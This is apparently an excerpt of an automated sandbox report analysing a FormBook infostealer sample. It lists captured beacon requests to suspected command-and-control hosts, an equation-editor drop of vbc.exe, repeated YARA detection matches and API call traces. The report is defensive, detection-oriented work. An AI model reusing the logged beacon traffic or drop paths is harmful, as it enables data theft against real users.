              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: 103.171.1.140
              Connection: Keep-Alive
          Source: global traffic HTTP traffic detected:
              GET /og2w/?6lRd8=pSr5u6Cd6G0oArdSS5DUX/x2v0PsX7Tf+WPQrsPbuuGn2pEwuIBu1IHHNpIgTiueDUTEKQ==&kjiDz=mH9p98O8MN HTTP/1.1
              Host: www.oojry.xyz
              Connection: close
              Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global traffic HTTP traffic detected:
              GET /og2w/?6lRd8=HRVKk55HqKhUKEplYc9Y+k8lMJF7Npxc0OkeINx2Urv2TzIY5LS2Gl5mjz9S2np0K2vYIQ==&kjiDz=mH9p98O8MN HTTP/1.1
              Host: www.crystalsbyzoe.com
              Connection: close
              Data Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,4_2_00404E07

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.vbc[1].exe
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2980000.4.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.vbc.exe.2980000.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.vbc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.458934235.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.661950337.0000000000070000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.495102913.0000000000700000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.661999463.00000000001A0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.494981815.0000000000430000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.461465178.0000000002980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.486605317.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.479874568.0000000007EF9000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.662048126.00000000002D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.457834492.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\Public\vbc.exeCode function: 4_2_004030E3 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,4_2_004030E3
          Source: C:\Users\Public\vbc.exeCode function: String function: 007A3F92 appears 132 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007CF970 appears 84 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0075DF5C appears 119 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0075E2A8 appears 38 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 007A373B appears 244 times
          Source: C:\Users\Public\vbc.exeCode function: String function: 0041C1E0 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0232DF5C appears 112 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0239F970 appears 81 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0232E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 02373F92 appears 108 times
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0237373B appears 238 times
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A360 NtCreateFile,5_2_0041A360
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A410 NtReadFile,5_2_0041A410
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A490 NtClose,5_2_0041A490
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A540 NtAllocateVirtualMemory,5_2_0041A540
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A45A NtReadFile,5_2_0041A45A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0041A40A NtReadFile,5_2_0041A40A
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750078 NtResumeThread,LdrInitializeThunk,5_2_00750078
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00750048 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00750048
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007500C4 NtCreateFile,LdrInitializeThunk,5_2_007500C4
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F900 NtReadFile,LdrInitializeThunk,5_2_0074F900
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074F9F0 NtClose,LdrInitializeThunk,5_2_0074F9F0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_0074FAE8 NtQueryInformationProcess,LdrInitializeThunk,5_2_0074FAE8
